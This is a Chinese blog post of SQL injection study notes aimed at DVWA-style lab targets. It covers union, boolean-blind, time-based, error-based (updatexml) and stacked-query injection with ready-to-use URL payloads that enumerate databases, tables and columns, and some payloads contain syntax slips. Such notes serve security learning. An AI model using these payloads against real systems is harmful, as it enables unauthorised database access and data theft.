【sql注入学习笔记】

已于 2024-04-27 15:08:34 修改
阅读量381 收藏 8
点赞数 5
文章标签: 数据库 oracle
于 2024-04-27 15:08:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40096118/article/details/138247214
版权

sql注入

sql注入原理

SQL注入是一种常见的网络安全漏洞,它利用了应用程序对用户输入数据的不正确处理。攻击者通过向应用程序的输入字段(比如登录表单、搜索框等)输入恶意的SQL代码,从而欺骗应用程序执行意外的SQL查询。
这种攻击的原理在于,应用程序未对用户输入进行充分验证和过滤,而是直接将用户输入的内容拼接到SQL查询语句中,导致攻击者能够执行恶意的SQL查询,比如修改数据库、获取敏感数据等。

常见的sql注入方式

union基础注入

单引号闭合前查询语句
‘#’ 或 ‘–’ 注释掉后边的语句
union后的语句返回的列数必须和原查询语句的列数相等
order by盲注列数排序

手工注入思路

url?id=1 order by 5# //确定查询返回参数的个数
url?id=1 union select 1,2,3,4# //确定显示哪列数据,确定后在对应的位置返回查询的值
url?id=1 union select 1,database(),3,4# 查询当前数据库名
url?id=1 union select 1,select group_concat(table_name) from information_schema.tables where table_schema='dvwa' limit 1,3,4#//查询所有表名
url?id=1 union select 1,select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='user',3,4#//查询表中字段名
url?id=1 union select 1,select group_concat(name) from dvwa.user,3,4#//查询表中数据,完成注入

布尔盲注

当页面只显示true或false不显示具体信息的情况下,则需要进行布尔盲注。布尔盲注攻击中,攻击者通过向数据库发送一系列特定的SQL查询,利用应用程序的响应来推断查询结果的真假。例如,攻击者可能会发送一个查询,询问数据库是否返回了预期的结果,然后根据应用程序的响应来判断查询条件是否为真。通过这种方式,攻击者可以逐步地推断出数据库中的信息,例如表名、列名、数据等。

适用场景:没有数据回显,条件正确有结果,错误没结果
利用方式:构造判断条件,逐个猜测(盲猜)

示例

url?id=1 and len(database())=4# //如果结果响应正确,说明数据库的长度为4
url?id=1 and substr(database(),1,1)='d'# //如果响应正确,说明数据库第一个字母为d,此处可用burp逐位爆破,当响应正确时,则证明这一位的字母是正确的
url?id=1 and substr((select table_name from information_schema where table_schema='dvwa' limit 1),1,1)='g'# //同理爆破表名

时间注入

时间注入通常使用SLEEP()函数。攻击者可以在注入点插入一个SLEEP()函数,并观察服务器响应时间是否延长来判断注入是否成功。

示例

url?id=1 and if((length(database())>5),sleep(5),1)# //如果数据库的长度大于5,则sleep5秒
url?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database=() limit 0,1),1,1))>101,sleep(1),0)# //猜表名

报错注入

如果应用程序没有直接将数据库返回的信息显示给用户,而是通过错误消息间接地暴露了一些信息,那么报错注入可以成为一种有用的手段。

报错注入常用函数

extractvalue(arg1,arg2)		#arg为参数
updatexml(arg1,arg2,arg3)
floor()						#floor(rand(0)*2)

示例

#一般用法
url?id=1' and updatexml(1,concat(0x7e,(查询语句),0x7e,[]),1) --+
url?id=1' and updatexml(1,concat(0x7e,database(),0x7e,@@datadir),1) --+
# 0x7e为~,目的是区分返回的数据
# @@datadir,存储数据的路径
url?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e,@@datadir),1) --+

堆叠查询注入

基本原理是在原始查询的结尾处添加分号,并在其后插入额外的查询语句。这些额外的查询语句被堆叠在一起,因此称为“堆叠查询”。

示例

url?id=1';select 1,2 from database.table# //用分号间隔开
侥幸哥·
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sql注入学习笔记-dvwa实战
xuqide77的博客
03-12 562
目录一、sql注入基础二、sql注入之union注入实战-dvwa1.先判断是数字型还是字符型2.使用order by查询出表的字段数量3.利用联合注入查询数据库名称、表、字段、字段数据 一、sql注入基础 sql注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击可控的,并且参数带入数据库查询,攻击者可以通过构造不同的sql语句来实现对数据库的任意操作。 sql注入漏洞的产生需要满足两个条件 (1)参数用户可控:前端传给后端的参数内容是用户可以控制的 (2)参数带入数据库查询:
sql注入学习笔记(一)
w17691058648x的博客
03-11 744
SQL注入:将sql语句注入进web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 具体来说就是讲sql语句注入进后台数据库中,从而达到盗取数据库数据的目的。 URL:同一资源定位符 http:// 192.168.246.130/sqli-labs-master/Less-1/ 协议 IP地址或域名...
SQL注入学习笔记
Dasdwer的博客
03-27 332
必要知识:在MySql5.0以上版本中,MySQL存在一个自带数据库名为information_schema,他是一个存储记录所有数据库名,表名,列名的数据库,也相当于可以通过查询他获取指定数据库下面的表名或列名信息。一般select 有回显,insert,update,delete等无回显,需要用到报错盲注(一般使用报错回显,效率最高)sqlmap,超级sql注入工具咋用的,怎么去获取数据库,读表,查数据 ,os-shell。报错显示,遗留文件,漏洞报错,平台配置文件,爆破(网站常见路径)等。
sql注入 学习笔记
weixin_45568648的博客
10-05 2814
自学sql注入
SQL注入学习笔记
星落
11-04 1095
SQL 注入就是指 web应用程序对用户输入的数据合法性没有过滤或者是判断,前端传入的参数是攻击者可以控制,并且参数带入数据库的查询,攻击者可以通过构造恶意的 sql语句来实现对数据库的任意操作;即通过把sql命令插入到Web表单提交或输入域名或页面请求的查询字符串中,最终欺骗服务器执行恶意的SQL命令
sql注入学习笔记
XiaoXiao_RenHe的专栏
03-12 331
sql注入如何判断数字型、字符型注入点,是否可以cookie传参,判断字段数。
sql注入学习笔记1
qq_61109509的博客
02-06 2820
[极客大挑战 2019]EASYSQL 根据提示,用户名就是cl4y,密码试一试万能密码。出现flag [强网杯 2019]随便注 先试试万能密码 再看下字段数,是两列 使用union联合查询检测信息回显位置,发现它过滤了select 学习一波堆叠注入 与仅限于SELECT语句的UNION联合查询攻击不同,堆叠注入可以用于执行任何SQL语句 首先展示所有数据库 没有我们想要的信息,那就展示一下所有的表 查看第一个表的信息 1;desc `191981093..
SQL注入学习笔记整理
zh的博客
10-19 2585
1、sql注入的基础知识 1.11、数据库中的逻辑运算符 或 且 非 or and not 真 且 真 =真 真 且 假 =假 真 或 假 =真 and 比 or 的优先级要高 1.12、mysql相关语法 注释: # -- --空格 /* */ /*! */ 内联查询 常见函数与参数: substring(string,position) 从某个位置开始截取字符串 substr(string,start,length) 截取字符串的一部分 left(str,l
sql注入学习笔记
m0_52341820的博客
04-14 360
一、Mysql基础知识 1、注释 单行注释 # 多行注释 /* */ 单行注释 --空格 一般用-- + 内联注释 /*!5001*/ 注释掉的内容只有高版本的mysql才会执行 2、语句 语句/函数 解释/功能 示例 union 用来拼接两个select语句,每个查询必须拥有相同列数,结果等于等一个select语句中的列名,默认选取不同值,允许重复值用union all ...
SQL注入漏洞学习笔记1
lilcur的博客
12-24 953
SQL注入漏洞入门学习
SQL注入手工笔记.txt
11-29
SQL手工注入小结笔记,大家都来学习学习
SQL注入笔记
02-07
SQL注入笔记 对于新手学习SQL注入很有帮助 欢迎大家查看
PHPSQL注入漏洞学习
01-21
SQL注入是攻击者通过输入恶意的SQL代码,欺骗数据库服务器执行非预期的操作,从而获取、修改、删除或添加数据的一种方法。在PHP环境中,由于不安全的用户输入处理,这种漏洞尤为突出。 二、PHP SQL注入的类型 1. ...
MyBatis-Plus 学习笔记.pdf
08-30
MyBatis-Plus 学习笔记 MyBatis-Plus 是一个基于 MyBatis 的增强工具,旨在简化开发、提高效率。它提供了许多实用的特性和功能,例如无侵入、损耗小、强大的 CRUD 操作、支持 Lambda 形式调用、支持多种数据库、...
webjs 数据库 离线读取本地数据库源码-SAAS 本地化及未来之窗行业应用跨平台架构
cybersnow精通 28 门计算机语言,凭借其超凡的技术能力,成功开发过上万个应用,广泛涉及政府、商业、个人等众多领域,甚至在检察院、环保局、公安局等专业场景中也大放异彩。不仅熟练掌握单片机和物联网开发,在软件架构设计方面更是独树一帜,自创了跨平台软件
08-15 237
【代码】webjs 数据库 离线读取本地数据库源码-SAAS 本地化及未来之窗行业应用跨平台架构。
LangChain与Elasticsearch向量数据库的完美结合
python1234_的博客
08-13 1451
在过去的一年中,生成式 AI (Generative AI) 领域取得了显著的进展。许多新的服务和工具应运而生。其中,LangChain 已成为构建大语言模型 (LLM) 应用程序(例如检索增强生成 (RAG) 系统)最受欢迎的框架之一。该框架极大地简化了原型开发,并使开发者能够轻松实验不同的模型和检索系统。最近Elasticsearch将其集成从社区包升级为官方的 LangChain 合作伙伴包。这一升级使得在 LangChain 应用程序中引入 Elasticsearch 功能变得更加简便。
旅游网站
最新发布
weixin_43213064的博客
08-16 642
【代码】springboot旅游网站
mysql介绍
weixin_57763462的博客
08-14 355
丰富的存储引擎:MySQL 提供了多种存储引擎,如 InnoDB、MyISAM、Memory 等,每种存储引擎都有其特定的应用场景和优势。多语言支持:MySQL 支持多种编程语言,包括 C、C++、Python、Java、Perl、PHP 等,并提供了相应的 API。安全性:MySQL 提供了灵活的权限和密码系统,支持基于主机的验证,并且所有的密码传输都采用加密形式,确保了数据的安全性。管理工具:MySQL 提供了丰富的管理工具,如命令行客户端、图形界面管理工具等,方便用户进行数据库的管理和维护。
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入学习过程...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值